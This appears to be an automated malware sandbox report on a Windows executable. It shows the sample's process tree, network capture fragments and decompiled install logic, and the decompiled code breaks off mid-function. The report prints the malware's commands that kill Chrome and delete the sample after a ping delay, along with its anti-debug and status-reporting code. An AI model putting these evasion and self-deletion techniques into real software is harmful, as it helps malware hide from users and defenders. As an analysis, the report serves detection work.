                                                                                                                                                    Jan 29, 2021 17:37:04.803195953 CET259INData Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be
                                                                                                                                                    Jan 29, 2021 17:37:04.803313017 CET260INData Raw: 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74
                                                                                                                                                    Data Ascii: iv> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <
                                                                                                                                                    Jan 29, 2021 17:37:04.803493977 CET260INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    Analysis Process: Cyfj6XGbkd.exe PID: 1676 Parent PID: 5892

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:33
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4247224 bytes
                                                                                                                                                    MD5 hash:63204EB716C856723A010747D58A6B00
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.366076006.00000000025E0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                    Reputation:low

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: msiexec.exe PID: 4828 Parent PID: 1676

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:38
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
                                                                                                                                                    Imagebase:0xf20000
                                                                                                                                                    File size:59904 bytes
                                                                                                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: 56BB1610C0318054.exe PID: 476 Parent PID: 1676

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:39
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4247224 bytes
                                                                                                                                                    MD5 hash:63204EB716C856723A010747D58A6B00
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000002.00000002.413908813.0000000002810000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    • Detection: 24%, Metadefender, Browse
                                                                                                                                                    • Detection: 59%, ReversingLabs
                                                                                                                                                    Reputation:low

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: msiexec.exe PID: 4584 Parent PID: 3980

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:39
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding C6BE2003C858D11BE040843C2C46EAA2 C
                                                                                                                                                    Imagebase:0xf20000
                                                                                                                                                    File size:59904 bytes
                                                                                                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: 56BB1610C0318054.exe PID: 576 Parent PID: 1676

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:40
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4247224 bytes
                                                                                                                                                    MD5 hash:63204EB716C856723A010747D58A6B00
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.378006718.0000000002560000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                    Reputation:low

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: cmd.exe PID: 6336 Parent PID: 1676

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:41
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: conhost.exe PID: 4328 Parent PID: 6336

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:41
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: PING.EXE PID: 6452 Parent PID: 6336

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:43
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                    Imagebase:0x1120000
                                                                                                                                                    File size:18944 bytes
                                                                                                                                                    MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: cmd.exe PID: 6012 Parent PID: 576

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:46
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: 1611970637183.exe PID: 6028 Parent PID: 476

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:47
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt'
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:103632 bytes
                                                                                                                                                    MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:low

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: conhost.exe PID: 1972 Parent PID: 6012

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:47
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: taskkill.exe PID: 5740 Parent PID: 6012

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:48
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:taskkill /f /im chrome.exe
                                                                                                                                                    Imagebase:0x330000
                                                                                                                                                    File size:74752 bytes
                                                                                                                                                    MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: cmd.exe PID: 6752 Parent PID: 576

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:49
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: conhost.exe PID: 6528 Parent PID: 6752

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:50
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: PING.EXE PID: 6624 Parent PID: 6752

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:50
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                    Imagebase:0x1120000
                                                                                                                                                    File size:18944 bytes
                                                                                                                                                    MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: ThunderFW.exe PID: 7156 Parent PID: 476

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:59
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
                                                                                                                                                    Imagebase:0x990000
                                                                                                                                                    File size:73160 bytes
                                                                                                                                                    MD5 hash:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 0%, Metadefender, Browse
                                                                                                                                                    • Detection: 2%, ReversingLabs

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: cmd.exe PID: 6236 Parent PID: 476

                                                                                                                                                    General

                                                                                                                                                    Start time:17:37:05
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: conhost.exe PID: 6304 Parent PID: 6236

                                                                                                                                                    General

                                                                                                                                                    Start time:17:37:05
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: PING.EXE PID: 4248 Parent PID: 6236

                                                                                                                                                    General

                                                                                                                                                    Start time:17:37:06
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                    Imagebase:0x1120000
                                                                                                                                                    File size:18944 bytes
                                                                                                                                                    MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >

                                                                                                                                                      Analysis Process: Cyfj6XGbkd.exe PID: 1676 Parent PID: 5892 Cyfj6XGbkd.exeCOMMON

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 100204C0, Relevance: 40.4, APIs: 10, Strings: 13, Instructions: 176COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E100204C0(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				long _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				void* __esi;
				void* _t46;
				int _t47;
				void* _t56;
				void* _t57;
				int _t62;
				intOrPtr _t73;
				int _t75;
				int _t77;
				void* _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t109;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t120;
				void* _t125;

				_t125 = __eflags;
				_t100 = __edi;
				_t82 = __ebx;
				_push(0xffffffff);
				_push(E10022D01);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t104;
				_push(_t101);
				E1001FD60();
				_v312 = 0;
				E1000CF20(__edi,  &_v311, 0, 0x103);
				GetModuleFileNameA(0,  &_v312, 0x104);
				E1001A600(__ebx, _t100, _t101, _t125,  &_v44); // executed
				_v8 = 0;
				_t46 = E10001A50( &_v312, E100011E0( &_v44));
				_t108 = _t104 - 0x264 + 0x18;
				_t126 = _t46;
				if(_t46 == 0) {
					_t47 = E1001A0F0("Global\\exist_sign__install_r3"); // executed
					_t109 = _t108 + 4;
					__eflags = _t47;
					if(_t47 == 0) {
						_v576 = 0;
						E1000CF20(_t100,  &_v575, 0, 0x103);
						GetTempPathA(0x104,  &_v576);
						E1000CD96( &_v576,  &_v576, 0x104, E100011E0( &_v44));
						_t111 = _t109 + 0x18;
						CopyFileA( &_v312,  &_v576, 0); // executed
						_v580 = GetTickCount();
						while(1) {
							_t56 = E1001A170( &_v312); // executed
							_t102 = _t56;
							_t57 = E1001A170( &_v576); // executed
							_t111 = _t111 + 8;
							__eflags = _t56 - _t57;
							if(__eflags == 0) {
								break;
							}
							Sleep(0x3e8);
							__eflags = GetTickCount() - _v580 - 0x7530;
							if(__eflags <= 0) {
								continue;
							} else {
							}
							break;
						}
						E1001FDB0(); // executed
						E1001FF90(_t82, _t100, _t102, __eflags, "install", "user01", "-0.25", "45.0.0", "exe"); // executed
						_t114 = _t111 + 0x14 - 0x1c;
						_t89 = _t114;
						_v588 = _t114;
						_v612 = E10001160(_t114, __eflags, "status=main_start");
						E10020180(_t82, _t100, _t102, __eflags); // executed
						_t115 = _t114 + 0x1c;
						_t62 = PathFileExistsA("C:\\hijack"); // executed
						__eflags = _t62;
						if(__eflags != 0) {
							L15:
							_t116 = _t115 - 0x1c;
							_v592 = _t116;
							_v616 = E10001160(_t116, __eflags, "status=check_debug");
							E10020180(_t82, _t100, _t102, __eflags); // executed
							_t118 = _t116 + 0x1c - 0x1c;
							_v596 = _t118;
							_v620 = E10001160(_t118, __eflags, "user01");
							E1001FEA0(_t82, _t100, _t102, __eflags); // executed
							_t120 = _t118 + 0x1c - 0x1c;
							_v600 = _t120;
							_v624 = E10001160(_t120, __eflags, "user01");
							E1001FDC0(_t82, _t100, _t102, __eflags); // executed
							_v604 = _t120 + 0x1c - 0x1c;
							_v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
							E10020180(_t82, _t100, _t102, __eflags); // executed
						} else {
							E1001A0A0(); // executed
							_t75 = E1001A0B0(_t89); // executed
							__eflags = _t75;
							if(_t75 == 0) {
								L12:
							} else {
								__eflags = E10019D10();
								if(__eflags == 0) {
									_t77 = E1001FA30(_t82, _t100, _t102, __eflags, 0x3e8, 0); // executed
									_t115 = _t115 + 8;
									__eflags = _t77;
									if(__eflags != 0) {
										goto L15;
									} else {
									}
								} else {
									goto L12;
								}
							}
						}
					} else {
					}
					E1001A260(); // executed
					_v608 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v608;
				} else {
					E10020A80(__ebx, _t100, _t101, _t126, "45.0.0");
					_v584 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v584;
				}
				 *[fs:0x0] = _v16;
				return _t73;
			}











































                                                                                                                                                      0x100204c0
                                                                                                                                                      0x100204c0
                                                                                                                                                      0x100204c0
                                                                                                                                                      0x100204c3
                                                                                                                                                      0x100204c5
                                                                                                                                                      0x100204d0
                                                                                                                                                      0x100204d1
                                                                                                                                                      0x100204de
                                                                                                                                                      0x100204df
                                                                                                                                                      0x100204e4
                                                                                                                                                      0x100204f9
                                                                                                                                                      0x1002050f
                                                                                                                                                      0x10020519
                                                                                                                                                      0x10020521
                                                                                                                                                      0x10020538
                                                                                                                                                      0x1002053d
                                                                                                                                                      0x10020540
                                                                                                                                                      0x10020542
                                                                                                                                                      0x1002057f
                                                                                                                                                      0x10020584
                                                                                                                                                      0x10020587
                                                                                                                                                      0x10020589
                                                                                                                                                      0x10020590
                                                                                                                                                      0x100205a5
                                                                                                                                                      0x100205b9
                                                                                                                                                      0x100205d4
                                                                                                                                                      0x100205d9
                                                                                                                                                      0x100205ec
                                                                                                                                                      0x100205f8
                                                                                                                                                      0x100205fe
                                                                                                                                                      0x10020605
                                                                                                                                                      0x1002060d
                                                                                                                                                      0x10020616
                                                                                                                                                      0x1002061b
                                                                                                                                                      0x1002061e
                                                                                                                                                      0x10020620
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10020627
                                                                                                                                                      0x10020639
                                                                                                                                                      0x1002063e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10020640
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1002063e
                                                                                                                                                      0x10020644
                                                                                                                                                      0x10020662
                                                                                                                                                      0x1002066a
                                                                                                                                                      0x1002066d
                                                                                                                                                      0x1002066f
                                                                                                                                                      0x1002067f
                                                                                                                                                      0x10020685
                                                                                                                                                      0x1002068a
                                                                                                                                                      0x10020692
                                                                                                                                                      0x10020698
                                                                                                                                                      0x1002069a
                                                                                                                                                      0x100206d0
                                                                                                                                                      0x100206d0
                                                                                                                                                      0x100206d5
                                                                                                                                                      0x100206e5
                                                                                                                                                      0x100206eb
                                                                                                                                                      0x100206f3
                                                                                                                                                      0x100206f8
                                                                                                                                                      0x10020708
                                                                                                                                                      0x1002070e
                                                                                                                                                      0x10020716
                                                                                                                                                      0x1002071b
                                                                                                                                                      0x1002072b
                                                                                                                                                      0x10020731
                                                                                                                                                      0x1002073e
                                                                                                                                                      0x1002074e
                                                                                                                                                      0x10020754
                                                                                                                                                      0x1002069c
                                                                                                                                                      0x1002069c
                                                                                                                                                      0x100206a1
                                                                                                                                                      0x100206a6
                                                                                                                                                      0x100206a8
                                                                                                                                                      0x100206b3
                                                                                                                                                      0x100206aa
                                                                                                                                                      0x100206af
                                                                                                                                                      0x100206b1
                                                                                                                                                      0x100206bf
                                                                                                                                                      0x100206c4
                                                                                                                                                      0x100206c7
                                                                                                                                                      0x100206c9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100206cb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100206b1
                                                                                                                                                      0x100206a8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1002058b
                                                                                                                                                      0x1002075c
                                                                                                                                                      0x10020761
                                                                                                                                                      0x1002076b
                                                                                                                                                      0x10020775
                                                                                                                                                      0x1002077a
                                                                                                                                                      0x10020544
                                                                                                                                                      0x10020549
                                                                                                                                                      0x10020551
                                                                                                                                                      0x1002055b
                                                                                                                                                      0x10020565
                                                                                                                                                      0x1002056a
                                                                                                                                                      0x1002056a
                                                                                                                                                      0x10020783
                                                                                                                                                      0x1002078e

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 100204F9
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002050F
                                                                                                                                                        • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                        • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileModuleName_memset$_sprintf
                                                                                                                                                      • String ID: -0.25$45.0.0$45.0.0$C:\hijack$Global\exist_sign__install_r3$exe$install$status=check_debug$status=main_over$status=main_start$user01$user01$user01
                                                                                                                                                      • API String ID: 3079340674-1842766907
                                                                                                                                                      • Opcode ID: 4ceaccf67b994171112047eb2ea22666bcadc8f3eed4853a9765ecac428517e0
                                                                                                                                                      • Instruction ID: 7a4b6182ef5b3e753845166e3f5bee58e7f320f9ef64b03b030670d1f597adbb
                                                                                                                                                      • Opcode Fuzzy Hash: 4ceaccf67b994171112047eb2ea22666bcadc8f3eed4853a9765ecac428517e0
                                                                                                                                                      • Instruction Fuzzy Hash: 5351A1B5D04318ABEB20EBA4DC4BBDE7775DB50344F500194F90966182EB71BB84CFA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001F720, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 177encryptionCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 52%
                                                                                                                                                      			E1001F720(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				char* _v16;
				BYTE* _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				char _v299;
				char _v300;
				char _v563;
				char _v564;
				signed int _v568;
				void* __ebp;
				BYTE* _t66;
				int _t69;
				int _t70;
				int _t71;
				long _t72;
				int _t75;
				signed int _t90;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t127;

				_t119 = __esi;
				_t118 = __edi;
				_t91 = __ebx;
